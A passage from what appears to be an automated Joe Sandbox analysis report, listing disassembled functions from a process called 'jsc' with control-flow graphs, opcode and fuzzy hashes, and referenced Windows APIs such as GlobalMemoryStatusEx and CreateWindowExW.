                                                            • Instruction Fuzzy Hash: 75919C70E00219DFDF14DFA9C9817EEBBF2AF88314F248129E414A7294EB749985DB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F69338 Relevance: .6, Instructions: 622COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b793576fdb883987cb5a344b1200bb89cfe666a44cbaccebc3c74de233ca8a51
                                                            • Instruction ID: 1e3e07b3cb09085dcf8721d760ba6a8d5a2149e75929313205bc5dd060deab83
                                                            • Opcode Fuzzy Hash: b793576fdb883987cb5a344b1200bb89cfe666a44cbaccebc3c74de233ca8a51
                                                            • Instruction Fuzzy Hash: 9F32AD34A042058FDB14DFA8D984BADBBF6EF89310F24856AE505EB395DBB0DC41DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F64A48 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e49c9856789f12b69a3a01f2aee851ce58d2fa22f5a0698504f5af3cce12aabf
                                                            • Instruction ID: a5cae2e13ff426661b0a0afef6e26154613b364abfa6e8c27023d4d567485ff2
                                                            • Opcode Fuzzy Hash: e49c9856789f12b69a3a01f2aee851ce58d2fa22f5a0698504f5af3cce12aabf
                                                            • Instruction Fuzzy Hash: 3EB17C70E002098FDF14EFA9C89579DBBF2AF88714F248129D815EB394EB74A845DB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F647C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 501 f647c0-f6484c 504 f64896-f64898 501->504 505 f6484e-f64859 501->505 507 f6489a-f648b2 504->507 505->504 506 f6485b-f64867 505->506 508 f6488a-f64894 506->508 509 f64869-f64873 506->509 514 f648b4-f648bf 507->514 515 f648fc-f648fe 507->515 508->507 510 f64877-f64886 509->510 511 f64875 509->511 510->510 513 f64888 510->513 511->510 513->508 514->515 517 f648c1-f648cd 514->517 516 f64900-f64945 515->516 525 f6494b-f64959 516->525 518 f648f0-f648fa 517->518 519 f648cf-f648d9 517->519 518->516 521 f648dd-f648ec 519->521 522 f648db 519->522 521->521 523 f648ee 521->523 522->521 523->518 526 f64962-f649bf 525->526 527 f6495b-f64961 525->527 534 f649c1-f649c5 526->534 535 f649cf-f649d3 526->535 527->526 534->535 536 f649c7-f649ca call f60ab8 534->536 537 f649d5-f649d9 535->537 538 f649e3-f649e7 535->538 536->535 537->538 540 f649db-f649de call f60ab8 537->540 541 f649f7-f649fb 538->541 542 f649e9-f649ed 538->542 540->538 544 f649fd-f64a01 541->544 545 f64a0b 541->545 542->541 543 f649ef 542->543 543->541 544->545 547 f64a03 544->547 548 f64a0c 545->548 547->545 548->548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm$\VTm
                                                            • API String ID: 0-2997445572
                                                            • Opcode ID: 1aa74f1399e521f6807fcb927275255d4435fd65e2eca531522b4ac2e5f0476c
                                                            • Instruction ID: 470e53de52057366660587398cd7dc33ee8b8f4104e2e0ddb36cd71c64de5bcd
                                                            • Opcode Fuzzy Hash: 1aa74f1399e521f6807fcb927275255d4435fd65e2eca531522b4ac2e5f0476c
                                                            • Instruction Fuzzy Hash: 15716970E002499FDF14EFA9C8857DEBBF2BF88724F148129E415A7294EB74A841DF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F647B4 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 549 f647b4-f6484c 553 f64896-f64898 549->553 554 f6484e-f64859 549->554 556 f6489a-f648b2 553->556 554->553 555 f6485b-f64867 554->555 557 f6488a-f64894 555->557 558 f64869-f64873 555->558 563 f648b4-f648bf 556->563 564 f648fc-f648fe 556->564 557->556 559 f64877-f64886 558->559 560 f64875 558->560 559->559 562 f64888 559->562 560->559 562->557 563->564 566 f648c1-f648cd 563->566 565 f64900-f64912 564->565 573 f64919-f64945 565->573 567 f648f0-f648fa 566->567 568 f648cf-f648d9 566->568 567->565 570 f648dd-f648ec 568->570 571 f648db 568->571 570->570 572 f648ee 570->572 571->570 572->567 574 f6494b-f64959 573->574 575 f64962-f649bf 574->575 576 f6495b-f64961 574->576 583 f649c1-f649c5 575->583 584 f649cf-f649d3 575->584 576->575 583->584 585 f649c7-f649ca call f60ab8 583->585 586 f649d5-f649d9 584->586 587 f649e3-f649e7 584->587 585->584 586->587 589 f649db-f649de call f60ab8 586->589 590 f649f7-f649fb 587->590 591 f649e9-f649ed 587->591 589->587 593 f649fd-f64a01 590->593 594 f64a0b 590->594 591->590 592 f649ef 591->592 592->590 593->594 596 f64a03 593->596 597 f64a0c 594->597 596->594 597->597
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm$\VTm
                                                            • API String ID: 0-2997445572
                                                            • Opcode ID: 5652021ae1426ed148746783b3bd018144546699160d174ab6b2bdec935ce2d1
                                                            • Instruction ID: f73fa805a27c5cc5a62a27b0554105916fc28912b4ad1f38b7efa69773c4e368
                                                            • Opcode Fuzzy Hash: 5652021ae1426ed148746783b3bd018144546699160d174ab6b2bdec935ce2d1
                                                            • Instruction Fuzzy Hash: A2714971E002499FDF10EFA9C8857DEBBF2BF88714F148129E415A7294EB74A841DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05F0DCD0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1209 5f0dcd0-5f0dcdb 1210 5f0dd05-5f0dd24 call 5f0d0b4 1209->1210 1211 5f0dcdd-5f0dd04 call 5f0d0a8 1209->1211 1217 5f0dd26-5f0dd29 1210->1217 1218 5f0dd2a-5f0dd89 1210->1218 1225 5f0dd8b-5f0dd8e 1218->1225 1226 5f0dd8f-5f0de1c GlobalMemoryStatusEx 1218->1226 1230 5f0de25-5f0de4d 1226->1230 1231 5f0de1e-5f0de24 1226->1231 1231->1230
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c14f67cdcf98cd0edb39487421d7394bfa245476ba7de8befe08cca7ea9c1809
                                                            • Instruction ID: dcbd1e7c26b47d97d46d356efc3d4e9c9f930af13bded3b80c567cc61a856f19
                                                            • Opcode Fuzzy Hash: c14f67cdcf98cd0edb39487421d7394bfa245476ba7de8befe08cca7ea9c1809
                                                            • Instruction Fuzzy Hash: A141D372E0435A8BCB14DFA9D8447EEBBF5EF89210F19856AD508E7280DB789845CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0604D3A4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1234 604d3a4-604d3a6 1235 604d3ae 1234->1235 1236 604d3a8-604d3ac 1234->1236 1237 604d3b6-604d416 1235->1237 1238 604d3b0-604d3b5 1235->1238 1236->1235 1239 604d421-604d428 1237->1239 1240 604d418-604d41e 1237->1240 1238->1237 1241 604d433-604d46b 1239->1241 1242 604d42a-604d430 1239->1242 1240->1239 1243 604d473-604d4d2 CreateWindowExW 1241->1243 1242->1241 1244 604d4d4-604d4da 1243->1244 1245 604d4db-604d513 1243->1245 1244->1245 1249 604d515-604d518 1245->1249 1250 604d520 1245->1250 1249->1250 1251 604d521 1250->1251 1251->1251
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D4C2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 3d4e13f8156afe8d7936b486a440ef447b676bbc79284d2d1cd69954a4a48ea4
                                                            • Instruction ID: aba07f56e94e998b80e9f4e1595d3728c207373b480e2c6d9f3829d0b251d1cd
                                                            • Opcode Fuzzy Hash: 3d4e13f8156afe8d7936b486a440ef447b676bbc79284d2d1cd69954a4a48ea4
                                                            • Instruction Fuzzy Hash: DC51C1B1D003499FDB54DF99C884ADEBFF5BF88310F24812AE819AB250D774A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0604D3B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1252 604d3b0-604d416 1254 604d421-604d428 1252->1254 1255 604d418-604d41e 1252->1255 1256 604d433-604d4d2 CreateWindowExW 1254->1256 1257 604d42a-604d430 1254->1257 1255->1254 1259 604d4d4-604d4da 1256->1259 1260 604d4db-604d513 1256->1260 1257->1256 1259->1260 1264 604d515-604d518 1260->1264 1265 604d520 1260->1265 1264->1265 1266 604d521 1265->1266 1266->1266
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D4C2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 56c5916a046d15d23d61741a927e4cea1539d5b78fbd5a2a2d455b81191fb3ef
                                                            • Instruction ID: 9d26d7df3b568d09938cf64e3d0b6f970af537372c596df542a7beed48821c00
                                                            • Opcode Fuzzy Hash: 56c5916a046d15d23d61741a927e4cea1539d5b78fbd5a2a2d455b81191fb3ef
                                                            • Instruction Fuzzy Hash: 5441AEB1D003499FDB54DF9AC884ADEBFB5BF88310F24812AE919AB250D775A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0604A88C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1267 604a88c-604fb3c 1271 604fb42-604fb47 1267->1271 1272 604fbec-604fc0c call 604a764 1267->1272 1273 604fb49-604fb80 1271->1273 1274 604fb9a-604fbd2 CallWindowProcW 1271->1274 1280 604fc0f-604fc1c 1272->1280 1281 604fb82-604fb88 1273->1281 1282 604fb89-604fb98 1273->1282 1277 604fbd4-604fbda 1274->1277 1278 604fbdb-604fbea 1274->1278 1277->1278 1278->1280 1281->1282 1282->1280
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0604FBC1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 3928f9acf3b5b6c519523a57e3ca739b979f5d3d71f571123893610694b5712e
                                                            • Instruction ID: 1f1a3308dc1ba95f48da116f7f80f09322e913106d3843482240e310a03a08d2
                                                            • Opcode Fuzzy Hash: 3928f9acf3b5b6c519523a57e3ca739b979f5d3d71f571123893610694b5712e
                                                            • Instruction Fuzzy Hash: 36411AB9900306CFDB54DF99C888AAEBBF5FF89314F24C859D519A7321D774A841CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05F0DDA0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1292 5f0dda0-5f0dde6 1294 5f0ddee-5f0de1c GlobalMemoryStatusEx 1292->1294 1295 5f0de25-5f0de4d 1294->1295 1296 5f0de1e-5f0de24 1294->1296 1296->1295
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F0DD22), ref: 05F0DE0F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 2510cd31fdcf19fdc92ec48117e4cfc9086711068aedb935ffc3497bc8a1432f
                                                            • Instruction ID: 11c9c488f1b2b41e7f904bd1c6baa7ae956c8c47c14c28f7db7a7a40c822da36
                                                            • Opcode Fuzzy Hash: 2510cd31fdcf19fdc92ec48117e4cfc9086711068aedb935ffc3497bc8a1432f
                                                            • Instruction Fuzzy Hash: A41114B2C0065A9BDB10DF9AC9447DEFBF4FF48320F14816AE918A7240D778A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05F0D0B4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1285 5f0d0b4-5f0de1c GlobalMemoryStatusEx 1288 5f0de25-5f0de4d 1285->1288 1289 5f0de1e-5f0de24 1285->1289 1289->1288
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F0DD22), ref: 05F0DE0F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 6f7f08f9581e250ca819be0c1e7c0bbb8e627aa262774e60165f3755f770e20d
                                                            • Instruction ID: b560ac266325ad218b303732ad269ef64539a20cd2cf4bc0c215358474de029b
                                                            • Opcode Fuzzy Hash: 6f7f08f9581e250ca819be0c1e7c0bbb8e627aa262774e60165f3755f770e20d
                                                            • Instruction Fuzzy Hash: DC1103B2C0065A9BCB10DF9AC5447DEFBF4EF48320F14816AE918A7240D7B8A950CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F63E27 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1365 f63e27-f63e96 1368 f63ee0-f63ee2 1365->1368 1369 f63e98-f63ea3 1365->1369 1371 f63ee4-f63f3c 1368->1371 1369->1368 1370 f63ea5-f63eb1 1369->1370 1372 f63ed4-f63ede 1370->1372 1373 f63eb3-f63ebd 1370->1373 1380 f63f86-f63f88 1371->1380 1381 f63f3e-f63f49 1371->1381 1372->1371 1374 f63ec1-f63ed0 1373->1374 1375 f63ebf 1373->1375 1374->1374 1377 f63ed2 1374->1377 1375->1374 1377->1372 1383 f63f8a-f63fa2 1380->1383 1381->1380 1382 f63f4b-f63f57 1381->1382 1384 f63f7a-f63f84 1382->1384 1385 f63f59-f63f63 1382->1385 1390 f63fa4-f63faf 1383->1390 1391 f63fec-f63fee 1383->1391 1384->1383 1386 f63f67-f63f76 1385->1386 1387 f63f65 1385->1387 1386->1386 1389 f63f78 1386->1389 1387->1386 1389->1384 1390->1391 1393 f63fb1-f63fbd 1390->1393 1392 f63ff0-f64002 1391->1392 1400 f64009-f6403e 1392->1400 1394 f63fe0-f63fea 1393->1394 1395 f63fbf-f63fc9 1393->1395 1394->1392 1397 f63fcd-f63fdc 1395->1397 1398 f63fcb 1395->1398 1397->1397 1399 f63fde 1397->1399 1398->1397 1399->1394 1401 f64044-f64052 1400->1401 1402 f64054-f6405a 1401->1402 1403 f6405b-f640bb 1401->1403 1402->1403 1410 f640bd-f640c1 1403->1410 1411 f640cb-f640cf 1403->1411 1410->1411 1412 f640c3 1410->1412 1413 f640d1-f640d5 1411->1413 1414 f640df-f640e3 1411->1414 1412->1411 1413->1414 1415 f640d7-f640da call f60ab8 1413->1415 1416 f640e5-f640e9 1414->1416 1417 f640f3-f640f7 1414->1417 1415->1414 1416->1417 1419 f640eb-f640ee call f60ab8 1416->1419 1420 f64107-f6410b 1417->1420 1421 f640f9-f640fd 1417->1421 1419->1417 1422 f6410d-f64111 1420->1422 1423 f6411b-f6411f 1420->1423 1421->1420 1425 f640ff-f64102 call f60ab8 1421->1425 1422->1423 1427 f64113 1422->1427 1428 f64121-f64125 1423->1428 1429 f6412f 1423->1429 1425->1420 1427->1423 1428->1429 1430 f64127 1428->1430 1431 f64130 1429->1431 1430->1429 1431->1431
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm
                                                            • API String ID: 0-628799665
                                                            • Opcode ID: b006e32f637f5af651f82b4b8941123645450d686535c0a3adc00bdc15e1e26d
                                                            • Instruction ID: 37bd2c914c31ccdacbf202cc705b2e330973c98b2cad9e01f0aa514a169cff63
                                                            • Opcode Fuzzy Hash: b006e32f637f5af651f82b4b8941123645450d686535c0a3adc00bdc15e1e26d
                                                            • Instruction Fuzzy Hash: 39918A70E00219DFDF14DFA8C9817DEBBF2AF88314F248129E814A7294EB749985DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F678C8 Relevance: .6, Instructions: 554COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41fe593d8d8d7da1bb5db807c76eccb64534b735df795ae13553ea7736540bd6
                                                            • Instruction ID: 1f2ce2687c8671d1596d9680dd4ff86728d7b43b93461f75ec5aa1925b117321
                                                            • Opcode Fuzzy Hash: 41fe593d8d8d7da1bb5db807c76eccb64534b735df795ae13553ea7736540bd6
                                                            • Instruction Fuzzy Hash: 48127E30B00206DBDB19AB3CE48576936E3EBC9354B54592EE206DB346CFB6DC86D781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F678D8 Relevance: .6, Instructions: 550COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a53369a0d09f3883d630df17b1a67e6f9b717cf0251e591670e874b02f16d6a
                                                            • Instruction ID: 0b491d9926f88289824171a3a89f88c9ac74b5da69497a50b24aff6a44d88322
                                                            • Opcode Fuzzy Hash: 9a53369a0d09f3883d630df17b1a67e6f9b717cf0251e591670e874b02f16d6a
                                                            • Instruction Fuzzy Hash: 42126E30B00206DBDB19AB3CE48576936E3EBC9354B54592EE206DB345CFB6DC86DB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F64A3F Relevance: .3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 098c936a29aa6caef214c87d990d28d0c596c8d445d583ccce2ad8459510337f
                                                            • Instruction ID: 55924afefbeaa39e12a4e6ff5ce54c5589bf1892529becd1104080f68f31d819
                                                            • Opcode Fuzzy Hash: 098c936a29aa6caef214c87d990d28d0c596c8d445d583ccce2ad8459510337f
                                                            • Instruction Fuzzy Hash: A4A16C70E00209CFDB10EFA9D88579DBBF1BF88714F248129E814EB394EB74A845DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F69324 Relevance: .2, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20c5b1b5ba0201621fe0f112679a3e338e80e63d64f9100e4eedb77ef7b6ab45
                                                            • Instruction ID: 273a4193517d707d5b8d330159bb6467be7f51c3a7333d2dfc9e64d962cbb734
                                                            • Opcode Fuzzy Hash: 20c5b1b5ba0201621fe0f112679a3e338e80e63d64f9100e4eedb77ef7b6ab45
                                                            • Instruction Fuzzy Hash: FB917035A14204DFCB18DF68D984AADBBF6EF88310F248469E806E7395DBB1DC46DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F66E8B Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a8c4e3b1229d0237b1511d91db34c206487a4a8670d8f5361a68ca020e23cc8
                                                            • Instruction ID: 20f17ff2d0a82c324c625c6de33ae6cb7784a3654c9176806c8fa809621d850e
                                                            • Opcode Fuzzy Hash: 5a8c4e3b1229d0237b1511d91db34c206487a4a8670d8f5361a68ca020e23cc8
                                                            • Instruction Fuzzy Hash: B651C130E0424A9FDB15DF78D8507AEB7B6EF8A310F10846AE505EB391EB719C41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F66C8F Relevance: .1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1330bb281e7e02f6c6d530d2f042d04a0200b46678471bdf742a8d65b6fadd9c
                                                            • Instruction ID: 66cbf8921e68aa443a37c2c70c9370647074ebbe39c9580d71d582ffad252d5a
                                                            • Opcode Fuzzy Hash: 1330bb281e7e02f6c6d530d2f042d04a0200b46678471bdf742a8d65b6fadd9c
                                                            • Instruction Fuzzy Hash: 0F511275E002588FDB18CFA9C884B9DFBB1BF48710F14852AE815BB351DB74A844CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F66C98 Relevance: .1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: edaba9a3bb99904d7b8e68b20d7bc3c6273f9ba031277e88676eddb82ebfa018
                                                            • Instruction ID: 9395ebde88e4f9fe9e0fee74eb05a554be0dede56fafa4c86559acfbe6908270
                                                            • Opcode Fuzzy Hash: edaba9a3bb99904d7b8e68b20d7bc3c6273f9ba031277e88676eddb82ebfa018
                                                            • Instruction Fuzzy Hash: 25510375E002588FDB18CFA9C884B9DFBB1BF48310F14852AE815BB351DB74A844DF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F696A0 Relevance: .1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2dfe88a5db569ea8adbaed1f159b8e1934ef0b26efed27b8fcf909e7c52eb569
                                                            • Instruction ID: b565d6cabdd584309eb45c42d2c5fe7e248ae45376e8e2f6ca8d67afc883c15a
                                                            • Opcode Fuzzy Hash: 2dfe88a5db569ea8adbaed1f159b8e1934ef0b26efed27b8fcf909e7c52eb569
                                                            • Instruction Fuzzy Hash: 9B416034F0424A8BDF20DEA9D5C077EB7BAEB86320F60082AD516D7384D675ED419B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F6112B Relevance: .1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0773fb69e371276f524db07a7096afeeb50d40b3cc54385f90aa4fe389b68632
                                                            • Instruction ID: 064a6449a7641fe724f7fc5b88ade824999e7d52a3d0c0170cba8ac688d815a2
                                                            • Opcode Fuzzy Hash: 0773fb69e371276f524db07a7096afeeb50d40b3cc54385f90aa4fe389b68632
                                                            • Instruction Fuzzy Hash: F451ED7511614ADFCA0AEF2DF990A563FB1FBDA305704596FD1007B2BADE70690ACB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F6F2AD Relevance: .1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 695ea651722079e831025ab0711b75c3779893a6f4aa6d7815105c2168e46d46
                                                            • Instruction ID: c63c1988bd5b30fd6ff7690b65485a0efc5964dbcde2c02d2764d586820921a6
                                                            • Opcode Fuzzy Hash: 695ea651722079e831025ab0711b75c3779893a6f4aa6d7815105c2168e46d46
                                                            • Instruction Fuzzy Hash: 6C31D230B002068FDB15AB74D55476E7BE2EF89750B240879D402EB395EE35CC4ADBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F6F2C0 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
